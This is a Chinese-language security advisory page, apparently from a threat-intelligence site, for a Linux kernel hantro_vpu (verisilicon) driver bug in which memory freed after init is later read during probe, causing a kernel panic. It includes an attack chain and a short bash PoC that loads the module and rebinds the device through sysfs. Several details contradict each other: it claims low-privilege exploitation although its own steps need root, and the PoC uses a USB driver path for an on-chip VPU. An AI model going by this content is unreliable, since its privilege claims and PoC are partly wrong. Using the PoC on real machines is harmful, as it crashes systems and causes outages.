CVE-2026-31573 CVSS 5.5 中危

CVE-2026-31573 Linux内核verisilicon驱动拒绝服务漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31573

漏洞类型

内存访问错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中verisilicon驱动因误用__initconst宏导致内存被提前释放，在模块probe时访问该内存引发内核崩溃，造成拒绝服务。

技术细节

该漏洞发生在Linux内核的verisilicon（hantro_vpu）驱动中。开发者将`imx8mq_vpu_shared_resources`数组标记为`__initconst`，导致该段内存在模块初始化完成后即被系统回收。然而，该数组仍被非初始化的probe代码通过`variant`结构体引用。当驱动作为模块加载，或在probe延迟、unbind-bind周期中，系统尝试访问该已释放的内存地址，触发“Unable to handle kernel paging request”错误，导致内核Panic及系统崩溃。这是一个典型的因生命周期管理不当导致的UAF类DoS漏洞。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者需要获得本地低权限用户访问权限。

STEP 2

2. 触发驱动加载

攻击者加载受影响的hantro_vpu内核模块，或等待系统自动加载。

STEP 3

3. 触发Probe或设备绑定

系统执行驱动探测程序，访问variant结构体中的shared_devices字段。

STEP 4

4. 访问已释放内存

驱动尝试访问已被__initconst释放的imx8mq_vpu_shared_resources内存区域。

STEP 5

5. 系统崩溃

触发内核页错误，导致Kernel Panic，系统重启或停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC: Trigger kernel panic by loading the vulnerable module
# This requires a vulnerable kernel version with the hantro_vpu driver.

# Attempt to load the module (or trigger hardware probe)
# On a system with affected hardware (i.MX8MQ VPU)
modprobe hantro_vpu

# Or if built-in, trigger device bind/unbind cycle
echo "1-1" > /sys/bus/usb/drivers/hantro_vpu/unbind
echo "1-1" > /sys/bus/usb/drivers/hantro_vpu/bind

# Expected Result: Kernel Panic (Unable to handle kernel paging request)

影响范围

Linux Kernel (特定commit之前的版本)

防御指南

临时缓解措施

如果无法立即升级内核，建议在系统中禁用hantro_vpu驱动模块（blacklist），防止其自动加载，从而避免触发漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表